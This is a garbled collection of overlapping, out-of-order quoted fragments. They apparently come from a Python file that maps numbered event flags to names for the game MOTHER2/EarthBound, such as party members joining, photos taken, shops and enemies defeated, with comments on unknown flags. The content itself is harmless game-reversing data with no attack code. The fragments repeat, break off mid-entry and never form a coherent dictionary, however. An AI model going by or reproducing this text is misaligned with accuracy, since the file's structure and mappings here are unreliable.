'SHOP_DESERT_DRUGSTORE_EQUIPMENT', 252: 'SHOP_DESERT_DRUGSTORE_CONSUMABLES',", "# 448 (???) 449: 'CAPTAIN_STRONG_AT_STATION_ENTRANCE', 450: 'CAPTAIN_STRONG_NOT_AT_STATION_DESK', 451: 'MONKEY_CAVE_SKIP_SANDWICH', 452: 'MONKEY_CAVE_PICNIC_LUNCH', 453: 'MONKEY_CAVE_WET_TOWEL',", "506: 'PHOTO_PYRAMID_AVAILABLE', 507: 'PHOTO_SCARABA_OASIS_AVAILABLE', 508: 'PHOTO_DEEP_DARKNESS_AVAILABLE', 509: 'PHOTO_TENDA_VILLAGE_AVAILABLE', 510: 'PHOTO_SATURN_VALLEY_FINAL_AVAILABLE', 511: 'GOT_TOWN_MAP', 512:", "'RUNAWAY_FIVE_FREE_FROM_CHAOS_THEATER', 120: 'SHOPPED_AT_FOOD_STAND', 121: 'DID_NOT_PAY_FOOD_STAND', 122: 'CARPAINTER_HAS_KEY', 123: 'BLUE_COW_ALT_TEXT', 124: 'ZOMBIE_PAPER_ON_TENT', 125: 'ZOMBIES_ON_TENT_FLOOR',", "528: 'NEAR_BLUE_GEYSER_2', # 529 (???) 530: 'TRACY_NOT_AT_HER_ROOM', 531: 'TRACY_DOWNSTAIRS', 532: 'NESS_ROOM_METEORITE_FALLING_MUSIC', 533: 'NESS_ROOM_METEORITE_CRASH_MUSIC',", "691: 'POO_LEFT_WITH_HAWK_EYE', 692: 'ESCARGO_EXPRESS_HAS_PAULAS_PENCIL_ERASER', 693: 'ESCARGO_EXPRESS_HAS_POOS_HAWK_EYE', 694: 'ESCARGO_EXPRESS_PENCIL_ERASER_DELIVERY', 695: 'ESCARGO_EXPRESS_HAWK_EYE_DELIVERY', 696: 'RANDOM_JEFF_ITEM_FIX_CHANCE', 697:", "610: 'DETECTIVE_IN_THREED', # 611 (Something about talking to Paula's dad and not talking", "128: 'JEFF_STARTS_HIS_JOURNEY', 129: 'TESSIE_EMERGES', 130: 'TALKED_TO_ANDONUTS_2', 131: 'WATERFALL_WAIT_ENABLED', 132: 'QUEST_TO_ZEXONYTE', 133: 'PHASE_DISTORTER_V2_OPEN', 134:", "628: 'PRESENTS_AT_SATURN_VALLEY', 629: 'PARTY_IS_DIRTY_FROM_BELCH_FIGHT', 630: 'BUBBLE_MONKEY_AT_LAKE_TESS', 631: 'TALKED_TO_MOONSIDE_MONOTOLI', 632: 'MONSTERS_IN_ONETT', 633: 'LIERS_HOUSE_UNLOCKED', 634:", "'TENDA_SHOP_HALL_OF_FAME_BAT', # 431 (???) 432: 'DEBUG_SKIP_SANDWICH_DX', 433: 'ZOMBIE_CHICK_HOTEL_MUSIC', 434: 'STARMAN_DX_ABSENT', # (Another flag", "'PICKY_KNOCKING_ON_DOOR', 764: 'READY_TO_LEARN_TELEPORT', 765: 'LEARNED_PHASE_DISTORTER_V2_FUNCTIONS', 766: 'EXIT_MOUSE_DISAGREEABLE', 767: 'LEARNED_ABOUT_UNDERWORLD_GEYSERS', 768: 'PAID_MUSEUM_ENTRANCE_FEE', # 769", "# 156 (???) # 157 (???) # 158 (???) 159: 'CHECKED_LAST_FLYING_MAN_TOMBSTONE', # 160", "157 (???) # 158 (???) 159: 'CHECKED_LAST_FLYING_MAN_TOMBSTONE', # 160 (???) # 161 (???)", "'GOT_MONKEYS_LOVE', 651: 'UNDERWORLD_TENDA_GATE_OPEN', 652: 'USED_CARROT_KEY', 653: 'SHOP_DEEP_DARKNESS_ARMS_DEALER', 654: 'DEEP_DARKNESS_BUSINESSMAN_PAID_DOCTORS_FEE', 655: 'SKY_RUNNER_MUSIC', 656: 'ALT_BUY_SOUND_EFFECT',", "Paula's dad and not talking to Everdred) 612: 'EVERDRED_NOT_AT_ROOF', 613: 'TELEPORT_MONKEY_NOT_AT_CAVE', 614: 'TELEPORT_MONKEY_NEAR_MONKEY_CAVE_ENTRANCE',", "'MOONSIDE_COUNTDOWN_GUY_3', 169: 'PHASE_DISTORTER_V2_BEING_FINISHED', # 170 (???) 171: 'GOT_SATURN_LIFENOODLES', 172: 'GOT_SATURN_COIN', 173: 'GOT_SATURN_STAG_BEETLE', 174:", "# Visibility flag for NPCs #851 and #852 760: 'PHASE_DISTORTER_MUSIC', # 761 (Unknown.", "for NPCs #457 and #459 774: 'TALKED_TO_MOONSIDE_SAILOR_MAN', # 775 (Can't get calls from", "calls from Dad?) 776: 'PAULA_AT_MONOTOLI_BUILDING', 777: 'GOT_SYNESS_BOOK_BACK_FROM_TENDA', 778: 'EXIT_MOUSE_ASLEEP', # 779 (Related to", "'COP_AT_ENTERTAINERS_SHACK', 37: 'ALOYSIUS_AT_HOME', 38: 'FIVE_COPS_AT_POLICE_STATION', 39: 'COP_AT_STATION_ENTRANCE', 40: 'SHARK_GUARDING_FRANK_DEFEATED', 41: 'CHAOS_THEATER_STAGE_UNBLOCKED', 42: 'APPLE_KID_IN_BURGLIN_PARK',", "'VISITED_DALAAM', 217: 'VISITED_SCARABA', 218: 'VISITED_DEEP_DARKNESS', 219: 'VISITED_TENDA_VILLAGE', 220: 'VISITED_UNDERWORLD', 221: 'UNUSED_BRAIN_FOOD_LUNCH', 222: 'UNUSED_REFRESHING_HERB',", "# 345 (Related to Lake Tess. This is only set if you're near", "33: 'LIER_INSIDE_CAVE_2', 34: 'PICKY_AT_HIS_ROOM', 35: 'POKEY_AT_HIS_ROOM', 36: 'COP_AT_ENTERTAINERS_SHACK', 37: 'ALOYSIUS_AT_HOME', 38: 'FIVE_COPS_AT_POLICE_STATION', 39:", "every version uses the same flag IDs FLAG_NAMES = { 1: 'TEMP_1', 2:", "'VISITED_DEEP_DARKNESS', 219: 'VISITED_TENDA_VILLAGE', 220: 'VISITED_UNDERWORLD', 221: 'UNUSED_BRAIN_FOOD_LUNCH', 222: 'UNUSED_REFRESHING_HERB', 223: 'GOT_PHASE_DISTORTER_HORN_OF_LIFE', 224: 'SHOP_SOLD_OLD_EQUIPMENT',", "(???) 432: 'DEBUG_SKIP_SANDWICH_DX', 433: 'ZOMBIE_CHICK_HOTEL_MUSIC', 434: 'STARMAN_DX_ABSENT', # (Another flag for Starman DX", "484: 'PHOTO_CHAOS_THEATER_AVAILABLE', 485: 'PHOTO_LAKE_TESS_AVAILABLE', 486: 'PHOTO_BRICK_ROAD_DUNGEON_AVAILABLE', 487: 'PHOTO_THREED_CEMETERY_AVAILABLE', 488: 'PHOTO_GRAPEFRUIT_FALLS_AVAILABLE', 489: 'PHOTO_SATURN_VALLEY_COFFEE_AVAILABLE', 490:", "set, Maxwell doesn't actually save your game. WHAT?) 805: 'PRESENT_CRACKED_BAT', 829: 'PRESENT_TONY_COOKIE_1', 830:", "'HAS_EXIT_MOUSE', 513: 'ONETT_POST_METEORITE_MUSIC', 514: 'JUST_RESTED_AT_HOME', 515: 'FRANK_DEFEATED', 516: 'MONKEY_CAVE_PENCIL_ERASED', 517: 'NESS_ROOM_LIGHTS_ON', 518: 'GUARDIAN_MOLE_TEXT_1',", "'SHOP_SUMMERS_GELATO', 269: 'SHOP_MAGIC_CAKE_LADY', 270: 'SHOP_DALAAM_RESTAURANT', 271: 'SHOP_SCARABA_HASSANS_SHOP', 272: 'DIAMOND_TO_BE_DELIVERED', 273: 'MU_TRAINING_COMPLETE', 274: 'DUNGEON_MAN_AT_PALM_TREES',", "284: 'PEACEFUL_REST_PENCIL_ERASED', 285: 'TALKED_TO_APPLE_KID_CAVE_OF_THE_PRESENT', # 286 (???) # 287 (Something about Lake Tess", "'NEAR_WINTERS_ROPE', 339: 'APPLE_KID_NOT_AT_HIS_HOUSE', # 340 (???) 341: 'RECEIVED_APPLE_KID_CALL_ABOUT_PENCIL_ERASER', 342: 'PYRAMID_OPEN', 343: 'GOT_HIEROGLYPH_COPY', 344:", "about \"Fancy Pokey\" in the Monotoli Building) -- Got kicked out of Pokey's", "'ONETT_COP_2_DEFEATED', 291: 'ONETT_COP_3_DEFEATED', 292: 'ONETT_COP_4_DEFEATED', 293: 'ONETT_COP_5_DEFEATED', 294: 'APPLE_MOUSE_BLOCKING_DOOR', 295: 'NESS_HOUSE_DOOR_KNOCKING', 296: 'ZOMBIE_CHICK_AT_HOTEL_1',", "'CHECKED_LAST_FLYING_MAN_TOMBSTONE', # 160 (???) # 161 (???) # 162 (???) # 163 (???)", "619 (Unkonwn. Related to Stonehenge Base) 620: 'APPLE_MOUSE_AT_WINTERS_LAB', 621: 'MONKEYS_AT_WINTERS_LAB', 622: 'BUBBLE_MONKEYS_WIFE_AT_WINTERS', 623:", "'MOONSIDE_SWITCH_YES_NO', 660: 'ALT_NO_TALK_TEXT', 661: 'CHOSEN_FOUR_SOULS_RETURNING_MUSIC', 662: 'DUNGEON_MAN_DESERT_MUSIC', 663: 'RETURNED_SHYNESS_BOOK', 664: 'TREMBLING_MONOTOLI_AT_48TH_FLOOR_ABSENT', 665: 'GOT_LETTER_FROM_MOM',", "'PHOTO_GRAPEFRUIT_FALLS_AVAILABLE', 489: 'PHOTO_SATURN_VALLEY_COFFEE_AVAILABLE', 490: 'PHOTO_CIRCUS_TENT_AVAILABLE', 491: 'PHOTO_BLACK_SESAME_SEED_AVAILABLE', 492: 'PHOTO_DESERT_MINE_AVAILABLE', 493: 'PHOTO_FOURSIDE_BRIDGE_AVAILABLE', 494: 'PHOTO_FOURSIDE_MUSEUM_OUTSIDE_AVAILABLE',", "after defeating Giygas, but never set) 770: 'LAST_ESCARGO_EXPRESS_CALL', # 771 (???) 772: 'LAST_DAD_CALL',", "321 (Something about Paula's Dad acknowledging the kidnapping) 322: 'PAULAS_DAD_NOTICED_SHES_NOT_HOME', 323: 'GOT_PAK_OF_BUBBLE_GUM', 324:", "412: 'LETHAL_ASP_HIEROGLYPH_6_DEFEATED', 413: 'LETHAL_ASP_HIEROGLYPH_7_DEFEATED', 414: 'LETHAL_ASP_HIEROGLYPH_8_DEFEATED', 415: 'LETHAL_ASP_HIEROGLYPH_9_DEFEATED', 416: 'BRICK_ROAD_DUNGEON_DUCK_1_DEFEATED', 417: 'BRICK_ROAD_DUNGEON_DUCK_2_DEFEATED', 418:", "80: 'GOT_KEY_TO_SHACK', 81: 'HAS_BICYCLE', 82: 'GOT_RECEIVER_PHONE', 83: 'GOT_PENCIL_ERASER', 84: 'GOT_HAND_AID', 85: 'GOT_WAD_OF_BILLS', 86:", "IDs FLAG_NAMES = { 1: 'TEMP_1', 2: 'TEMP_2', 3: 'TEMP_3', 4: 'TEMP_4', 5:", "'BROKEN_SKYRUNNER_THREED', 48: 'FIXED_SKYRUNNER_THREED', 49: 'BOOGEY_TENT_IN_THREED', 50: 'BRICK_ROAD_OUTSIDE_DUNGEON', 51: 'SHYNESS_BOOK_AT_LIBRARY', 52: 'CAPTIVES_AT_STONEHENGE', 53: 'TALKED_TO_BRICK_ROAD',", "326: 'SHOP_SCARABA_HOTEL_ARMS_DEALER', 327: 'PHASE_DISTORTER_V3_AT_CAVE_OF_THE_PRESENT', 328: 'ANDONUTS_AT_CAVE_OF_THE_PRESENT_1', 329: 'APPLE_KID_AT_CAVE_OF_THE_PRESENT', 330: 'MR_SATURN_AT_CAVE_OF_THE_PRESENT', 331: 'ANDONUTS_AT_CAVE_OF_THE_PRESENT_2', 332:", "# 380 (???) # 381 (???) 382: 'KIDNAPPED_MR_SATURN_AT_CAVE_OF_THE_PRESENT', 383: 'JUST_RESTED', 384: 'GOT_ALL_MELODIES', 385:", "'FOURSIDE_DEPT_BLACKOUT', 58: 'FOURSIDE_SEWERS_OPEN', 59: 'ELECTRA_OUTSIDE_BUILDING', 60: 'EVERDRED_OUTSIDE_CAFE', 61: 'MAGIC_CAKE_LADY_IDENTIFIED', 62: 'DUNGEON_MAN_IN_DESERT', 63: 'PATH_TO_MANI_MANI_OPEN',", "567: 'HIDE_TWOSON_BUS_STOP_TOWN_MAP', 568: 'HIDE_TWOSON_HOSPITAL_TOWN_MAP', 569: 'HIDE_TWOSON_TO_THREED_TOWN_MAP', 570: 'HIDE_THREED_DRUGSTORE_TOWN_MAP', 571: 'HIDE_THREED_HOTEL_TOWN_MAP', # 572 (???)", "Related to Stonehenge Base) 620: 'APPLE_MOUSE_AT_WINTERS_LAB', 621: 'MONKEYS_AT_WINTERS_LAB', 622: 'BUBBLE_MONKEYS_WIFE_AT_WINTERS', 623: 'PUNK_GUY_OUTSIDE_HIS_HOUSE_THREED', 624:", "'GOT_MAGIC_TRUFFLE_5', 444: 'KING_JOINS', 445: 'TALKED_TO_BRICK_ROADS_HEAD', 446: 'FOR_SALE_SIGN_CUSTOMER_1', # 447 (???) # 448 (???)", "329: 'APPLE_KID_AT_CAVE_OF_THE_PRESENT', 330: 'MR_SATURN_AT_CAVE_OF_THE_PRESENT', 331: 'ANDONUTS_AT_CAVE_OF_THE_PRESENT_2', 332: 'PHASE_DISTORTER_V2_AT_CAVE_OF_THE_PRESENT', 333: 'DESERT_MINE_BULLDOZER_MOVED', 334: 'BUBBLE_MONKEY_JOINS', 335:", "talking to Everdred) 612: 'EVERDRED_NOT_AT_ROOF', 613: 'TELEPORT_MONKEY_NOT_AT_CAVE', 614: 'TELEPORT_MONKEY_NEAR_MONKEY_CAVE_ENTRANCE', 615: 'TELEPORT_MONKEY_NEAR_DESERT_ROAD', 616: 'TENDAKRAUT_STOLEN',", "441: 'GOT_MAGIC_TRUFFLE_3', 442: 'GOT_MAGIC_TRUFFLE_4', 443: 'GOT_MAGIC_TRUFFLE_5', 444: 'KING_JOINS', 445: 'TALKED_TO_BRICK_ROADS_HEAD', 446: 'FOR_SALE_SIGN_CUSTOMER_1', #", "'LIERS_HOUSE_UNLOCKED', 634: 'PAULA_TELEPATHY_DREAM_1', 635: 'PAULA_TELEPATHY_DREAM_2', 636: 'PAULA_TELEPATHY_DREAM_JEFF', 637: 'POO_AT_HIS_PALACE', 638: 'PAULA_AT_HER_ROOM', 639: 'TALKED_TO_MAGICANT_EVERDRED',", "'WATERFALL_WAIT_ENABLED', 132: 'QUEST_TO_ZEXONYTE', 133: 'PHASE_DISTORTER_V2_OPEN', 134: 'DELIVERED_ZEXONYTE', 135: 'TALKED_TO_BLACK_SESAME_SEED', 136: 'TRAFFIC_JAM_CLEARED', 137: 'GAVE_FOOD_TO_MONTAGUE',", "# 522 (Multipurpose?) # 523 (Multipurpose?) 524: 'YOUR_SANCTUARY_MUSIC', # 525 (???) 526: 'NEAR_BLUE_GEYSER_1',", "'LIER_BY_MANI_MANI', 309: 'RUNAWAY_BUS_FROM_TWOSON_TO_THREED', 310: 'POKEY_WAITING_AT_COUCH', 311: 'WINTERS_ROPE_LOWERED', 312: 'GHOSTS_BLOCKING_THREED', # 313 (Unknown. Something", "22: 'BUBBLE_MONKEY_IN_PARTY', 23: 'TONY_JOINS', 24: 'DUNGEON_MAN_JOINS', 25: 'FLYING_MAN_1_JOINS', 26: 'FLYING_MAN_2_JOINS', 27: 'FLYING_MAN_3_JOINS', 28:", "(Checked when you talk to Tracy after defeating Giygas, but never set) 770:", "(???) 379: 'ANDONUTS_AT_LAB_ABSENT', # 380 (???) # 381 (???) 382: 'KIDNAPPED_MR_SATURN_AT_CAVE_OF_THE_PRESENT', 383: 'JUST_RESTED',", "only for palette changes, maybe) 435: 'GUARDIAN_GENERAL_DEFEATED', 436: 'SEA_OF_EDEN_KRAKEN_1_DEFEATED', 437: 'SEA_OF_EDEN_KRAKEN_2_DEFEATED', 438: 'SEA_OF_EDEN_KRAKEN_3_DEFEATED',", "your game. WHAT?) 805: 'PRESENT_CRACKED_BAT', 829: 'PRESENT_TONY_COOKIE_1', 830: 'PRESENT_TONY_COOKIE_2', 831: 'PRESENT_TONY_COOKIE_3', 832: 'PRESENT_TONY_COOKIE_4',", "'HIDE_SUMMERS_RESTAURANT_TOWN_MAP', 584: 'HIDE_SUMMERS_SHOP_TOWN_MAP', 585: 'HIDE_SUMMERS_HOSPITAL_TOWN_MAP', 586: 'HIDE_TOTO_SHOP_TOWN_MAP', 587: 'FLYING_MAN_MUSIC', # 588 (Visibility flag", "# 231 (I hate multipurpose flags) # 232 (I hate multipurpose flags) #", "'GOT_PHOTO_GRAPEFRUIT_FALLS', 708: 'GOT_PHOTO_SATURN_VALLEY_COFFEE', 709: 'GOT_PHOTO_CIRCUS_TENT', 710: 'GOT_PHOTO_BLACK_SESAME_SEED', 711: 'GOT_PHOTO_DESERT_MINE', 712: 'GOT_PHOTO_FOURSIDE_BRIDGE', 713: 'GOT_PHOTO_FOURSIDE_MUSEUM_OUTSIDE',", "'PYRAMID_OPEN', 343: 'GOT_HIEROGLYPH_COPY', 344: 'LAKE_TESS_WIND_BLOWING', # 345 (Related to Lake Tess. This is", "626: 'MEN_ABOUT_TO_ENTER_CIRCUS_TENT', 627: 'TRACY_HAS_SOUND_STONE', 628: 'PRESENTS_AT_SATURN_VALLEY', 629: 'PARTY_IS_DIRTY_FROM_BELCH_FIGHT', 630: 'BUBBLE_MONKEY_AT_LAKE_TESS', 631: 'TALKED_TO_MOONSIDE_MONOTOLI', 632:", "'PHOTO_THREED_CEMETERY_AVAILABLE', 488: 'PHOTO_GRAPEFRUIT_FALLS_AVAILABLE', 489: 'PHOTO_SATURN_VALLEY_COFFEE_AVAILABLE', 490: 'PHOTO_CIRCUS_TENT_AVAILABLE', 491: 'PHOTO_BLACK_SESAME_SEED_AVAILABLE', 492: 'PHOTO_DESERT_MINE_AVAILABLE', 493: 'PHOTO_FOURSIDE_BRIDGE_AVAILABLE',", "'SHOP_THREED_ARMS_DEALER', 244: 'SHOP_THREED_BAKERY', 245: 'SHOP_WINTERS_DRUGSTORE', 246: 'SHOP_LAB_CAVE_BOY', 247: 'SHOP_GRAPEFRUIT_FALLS', 248: 'SHOP_SATURN_EQUIPMENT', 249: 'SHOP_SATURN_PENDANTS',", "719: 'GOT_PHOTO_STONEHENGE', 720: 'GOT_PHOTO_SUMMERS_HOTEL', 721: 'GOT_PHOTO_FOURSIDE_RESTAURANT', 722: 'GOT_PHOTO_SUMMERS_BEACH', 723: 'GOT_PHOTO_TOTO', 724: 'GOT_PHOTO_SCARABA_BAZAAR', 725:", "'GAVE_RUBY_TO_HIEROGLYPHS_GUY', 347: 'PYRAMID_HOLE_OPEN', 348: 'GOT_HAWK_EYE', 349: 'JUST_WOKE_UP_FROM_MAGICANT', 350: 'USED_ELEVATOR', 351: 'HH_HQ_CULTIST_1_DEFEATED', 352: 'HH_HQ_CULTIST_2_DEFEATED',", "the Monotoli Building) -- Got kicked out of Pokey's Room in the Monotoli", "for palette changes, maybe) 435: 'GUARDIAN_GENERAL_DEFEATED', 436: 'SEA_OF_EDEN_KRAKEN_1_DEFEATED', 437: 'SEA_OF_EDEN_KRAKEN_2_DEFEATED', 438: 'SEA_OF_EDEN_KRAKEN_3_DEFEATED', 439:", "'HIDE_SUMMERS_HOSPITAL_TOWN_MAP', 586: 'HIDE_TOTO_SHOP_TOWN_MAP', 587: 'FLYING_MAN_MUSIC', # 588 (Visibility flag for someone in Threed?)", "84: 'GOT_HAND_AID', 85: 'GOT_WAD_OF_BILLS', 86: 'GOT_FRANKLIN_BADGE', 87: 'GOT_FLY_HONEY', 88: 'GOT_BAD_KEY_MACHINE', 89: 'GOT_SHYNESS_BOOK', 90:", "'PEACEFUL_REST_PENCIL_ERASED', 285: 'TALKED_TO_APPLE_KID_CAVE_OF_THE_PRESENT', # 286 (???) # 287 (Something about Lake Tess color", "11: 'ENEMY_SUPPRESS', 12: 'PAULAS_PARENTS_KNOW_ABOUT_HH_RESCUE', 13: 'PAULA_JOINS', 14: 'JEFF_JOINS', 15: 'MONSTERS_IN_WINTERS', 16: 'POO_JOINS', 17:", "show about to start?) 681: 'SHOW_ONETT_HINT_TOWN_MAP', 682: 'SHOW_TWOSON_HINT_TOWN_MAP', 683: 'SHOW_THREED_HINT_TOWN_MAP', 684: 'SHOW_FOURSIDE_HINT_TOWN_MAP', 685:", "79: 'GOT_METEORITE_PIECE', 80: 'GOT_KEY_TO_SHACK', 81: 'HAS_BICYCLE', 82: 'GOT_RECEIVER_PHONE', 83: 'GOT_PENCIL_ERASER', 84: 'GOT_HAND_AID', 85:", "60: 'EVERDRED_OUTSIDE_CAFE', 61: 'MAGIC_CAKE_LADY_IDENTIFIED', 62: 'DUNGEON_MAN_IN_DESERT', 63: 'PATH_TO_MANI_MANI_OPEN', 64: 'FRANKYSTEIN_MKII_DEFEATED', # 65 (???)", "110 (???) 111: 'VISITED_PEACEFUL_REST_PENCIL', 112: 'INVESTED_IN_APPLE_KID', 113: 'STUBBY_LEGS', 114: 'TWOSON_DEPT_MAN', 115: 'CHAOS_THEATER_BACKSTAGE_OPEN', 116:", "at Fourside Bridge?) 145: 'TALKED_TO_DYING_EVERDRED', 146: 'RUNAWAY_FIVE_FREE_FROM_TOPOLLA_THEATER', # 147 (Venus at Topolla?) 148:", "72?) # 283 (???) 284: 'PEACEFUL_REST_PENCIL_ERASED', 285: 'TALKED_TO_APPLE_KID_CAVE_OF_THE_PRESENT', # 286 (???) # 287", "588 (Visibility flag for someone in Threed?) # 589 (Visibility flag for some", "defeating Giygas, but never set) 770: 'LAST_ESCARGO_EXPRESS_CALL', # 771 (???) 772: 'LAST_DAD_CALL', 773:", "21: 'POKEY_IN_PARTY', 22: 'BUBBLE_MONKEY_IN_PARTY', 23: 'TONY_JOINS', 24: 'DUNGEON_MAN_JOINS', 25: 'FLYING_MAN_1_JOINS', 26: 'FLYING_MAN_2_JOINS', 27:", "'DUNGEON_MAN_OPEN', # 607 (Unknown. Related to desert mine?) 608: 'DESERT_MINE_TO_EXPAND_NEXT_NIGHT', 609: 'WINTERS_PENCIL_ERASED', 610:", "MOTHER2/Earthbound # Luckily, every version uses the same flag IDs FLAG_NAMES = {", "47: 'BROKEN_SKYRUNNER_THREED', 48: 'FIXED_SKYRUNNER_THREED', 49: 'BOOGEY_TENT_IN_THREED', 50: 'BRICK_ROAD_OUTSIDE_DUNGEON', 51: 'SHYNESS_BOOK_AT_LIBRARY', 52: 'CAPTIVES_AT_STONEHENGE', 53:", "231 (I hate multipurpose flags) # 232 (I hate multipurpose flags) # 233", "TODO: CONFIRM 595: 'STAR_MASTER_NEXT_TO_MU', # 596 (???) 597: 'SHOP_SCARABA_BAZAAR_FOOD', 598: 'SHOP_SCARABA_WATER', 599: 'SHOP_SOUTH_SCARABA_VARIETY',", "to desert mine?) 608: 'DESERT_MINE_TO_EXPAND_NEXT_NIGHT', 609: 'WINTERS_PENCIL_ERASED', 610: 'DETECTIVE_IN_THREED', # 611 (Something about", "'SEA_OF_EDEN_KRAKEN_2_DEFEATED', 438: 'SEA_OF_EDEN_KRAKEN_3_DEFEATED', 439: 'GOT_MAGIC_TRUFFLE_1', 440: 'GOT_MAGIC_TRUFFLE_2', 441: 'GOT_MAGIC_TRUFFLE_3', 442: 'GOT_MAGIC_TRUFFLE_4', 443: 'GOT_MAGIC_TRUFFLE_5',", "'HIDE_THREED_TO_TWOSON_TOWN_MAP', 643: 'READY_TO_LOOK_AT_PHOTO_ALBUM', 644: 'GOT_SATURN_RIBBON', 645: 'ESCARGO_EXPRESS_PICK_UP', 646: 'FOR_SALE_SIGN_CUSTOMER_2', 647: 'FOR_SALE_SIGN_CUSTOMER_3', 648: 'FOR_SALE_SIGN_CUSTOMER_4',", "(???) 303: 'BUZZ_BUZZ_DYING_ON_FLOOR', 304: 'KING_AWAKE_AT_HOME', # 305 (???) 306: 'LIER_INSIDE_CAVE_3', 307: 'LIER_INSIDE_CAVE_4', 308:", "# 160 (???) # 161 (???) # 162 (???) # 163 (???) #", "{ 1: 'TEMP_1', 2: 'TEMP_2', 3: 'TEMP_3', 4: 'TEMP_4', 5: 'TEMP_5', 6: 'TEMP_6',", "(???) 341: 'RECEIVED_APPLE_KID_CALL_ABOUT_PENCIL_ERASER', 342: 'PYRAMID_OPEN', 343: 'GOT_HIEROGLYPH_COPY', 344: 'LAKE_TESS_WIND_BLOWING', # 345 (Related to", "'VISITED_TWOSON', 211: 'VISITED_THREED', 212: 'VISITED_WINTERS', 213: 'VISITED_SATURN_VALLEY', 214: 'VISITED_FOURSIDE', 215: 'VISITED_SUMMERS', 216: 'VISITED_DALAAM',", "'GUARDIAN_MOLE_4_DEFEATED', 281: 'GUARDIAN_MOLE_5_DEFEATED', # 282 (Five moles defeated? How does this differ from", "# 775 (Can't get calls from Dad?) 776: 'PAULA_AT_MONOTOLI_BUILDING', 777: 'GOT_SYNESS_BOOK_BACK_FROM_TENDA', 778: 'EXIT_MOUSE_ASLEEP',", "'GOT_KEY_TO_SHACK', 81: 'HAS_BICYCLE', 82: 'GOT_RECEIVER_PHONE', 83: 'GOT_PENCIL_ERASER', 84: 'GOT_HAND_AID', 85: 'GOT_WAD_OF_BILLS', 86: 'GOT_FRANKLIN_BADGE',", "'TALKED_TO_FRESH_EGG_GIVING_MONKEY', 464: 'GOT_KING_BANANA', # 465 (???) 466: 'PICKY_SLEEPING_AT_METEORITE', # 467 (Unknown. Related to", "Pokey's Room in the Monotoli Building? 626: 'MEN_ABOUT_TO_ENTER_CIRCUS_TENT', 627: 'TRACY_HAS_SOUND_STONE', 628: 'PRESENTS_AT_SATURN_VALLEY', 629:", "to Apple Kid 127: 'TALKED_TO_ANDONUTS_1', 128: 'JEFF_STARTS_HIS_JOURNEY', 129: 'TESSIE_EMERGES', 130: 'TALKED_TO_ANDONUTS_2', 131: 'WATERFALL_WAIT_ENABLED',", "Machine) # 377 (???) # 378 (???) 379: 'ANDONUTS_AT_LAB_ABSENT', # 380 (???) #", "'GOT_ALL_MELODIES', 385: 'GOT_CONTACT_LENS', 386: 'MOONSIDE_ENRAGED_FIRE_PLUG_DEFEATED', # Unused, there's no NPC attached to the", "'HIDE_FOURSIDE_HOTEL_TOWN_MAP', 579: 'HIDE_SCARABA_HOTEL_TOWN_MAP', 580: 'HIDE_SCARABA_HOSPITAL_TOWN_MAP', 581: 'HIDE_SCARABA_SHOP_TOWN_MAP', 582: 'HIDE_SUMMERS_HOTEL_TOWN_MAP', 583: 'HIDE_SUMMERS_RESTAURANT_TOWN_MAP', 584: 'HIDE_SUMMERS_SHOP_TOWN_MAP',", "Confirm 140: 'QUEST_TO_VENUS_AUTOGRAPH', 141: 'GOT_TROUT_YOGURT', 142: 'CAN_ACCESS_48TH_MONOTILI_FLOOR', 143: 'FOURSIDE_FREE_FROM_MONOTOLI', # 144 (Related to", "404: 'GUARDIAN_HIEROGLYPH_15_DEFEATED', 405: 'GUARDIAN_HIEROGLYPH_16_DEFEATED', 406: 'GUARDIAN_HIEROGLYPH_17_DEFEATED', 407: 'LETHAL_ASP_HIEROGLYPH_1_DEFEATED', 408: 'LETHAL_ASP_HIEROGLYPH_2_DEFEATED', 409: 'LETHAL_ASP_HIEROGLYPH_3_DEFEATED', 410:", "# 747 (??? Something about Runaway Five Tour Bus???) 748: 'SKY_RUNNER_AT_WINTERS_LAB', 749: 'NESS_WEARING_PAJAMAS',", "Hieroglyph Guardian doesn't reference this flag and never fights you 391: 'GUARDIAN_HIEROGLYPH_2_DEFEATED', #", "'FOURSIDE_DEPT_LIGHTS_OUT', 556: 'FOURSIDE_DEPT_BLACKOUT_JUST_ENDED', 557: 'READY_TO_SAIL_TO_SCARABA', 558: 'HIDE_ONETT_DRUGSTORE_TOWN_MAP', 559: 'HIDE_ONETT_BURGER_SHOP_TOWN_MAP', 560: 'HIDE_ONETT_HOTEL_TOWN_MAP', 561: 'HIDE_ONETT_HOSPITAL_TOWN_MAP',", "496: 'PHOTO_MONOTOLI_BUILDING_AVAILABLE', 497: 'PHOTO_FOURSIDE_DEPT_STORE_AVAILABLE', 498: 'PHOTO_POOS_PALACE_INSIDE_AVAILABLE', 499: 'PHOTO_POOS_PALACE_OUTSIDE_AVAILABLE', 500: 'PHOTO_STONEHENGE_AVAILABLE', 501: 'PHOTO_SUMMERS_HOTEL_AVAILABLE', 502:", "667: 'GOT_LETTER_FROM_KIDS', 668: 'TALKED_TO_MONTAGUE_AT_SATURN_VALLEY_BEFORE_MAGICANT', 669: 'FLY_HONEY_TRASH_CAN_VISIBLE', 670: 'GOT_FOR_SALE_SIGN', # 671 (???) 672: 'POKEY_FLIES_AWAY_BY_HELICOPTER',", "549: 'QUEUE_OUTSIDE_CHAOS_THEATER', 550: 'GOT_SUPORMA', 551: 'GAVE_FOOD_TO_APPLE_KID', 552: 'GOT_ZOMBIE_PAPER', 553: 'GOT_BACKSTAGE_PASS', 554: 'GOT_YOGURT_DISPENSER', 555:", "665: 'GOT_LETTER_FROM_MOM', 666: 'GOT_LETTER_FROM_TONY', 667: 'GOT_LETTER_FROM_KIDS', 668: 'TALKED_TO_MONTAGUE_AT_SATURN_VALLEY_BEFORE_MAGICANT', 669: 'FLY_HONEY_TRASH_CAN_VISIBLE', 670: 'GOT_FOR_SALE_SIGN', #", "'VISITED_THREED', 212: 'VISITED_WINTERS', 213: 'VISITED_SATURN_VALLEY', 214: 'VISITED_FOURSIDE', 215: 'VISITED_SUMMERS', 216: 'VISITED_DALAAM', 217: 'VISITED_SCARABA',", "513: 'ONETT_POST_METEORITE_MUSIC', 514: 'JUST_RESTED_AT_HOME', 515: 'FRANK_DEFEATED', 516: 'MONKEY_CAVE_PENCIL_ERASED', 517: 'NESS_ROOM_LIGHTS_ON', 518: 'GUARDIAN_MOLE_TEXT_1', 519:", "'PAULA_AT_HER_ROOM', 639: 'TALKED_TO_MAGICANT_EVERDRED', 640: 'HIDE_FOURSIDE_TO_DESERT_TOWN_MAP', 641: 'HIDE_THREED_TO_DESERT_TOWN_MAP', 642: 'HIDE_THREED_TO_TWOSON_TOWN_MAP', 643: 'READY_TO_LOOK_AT_PHOTO_ALBUM', 644: 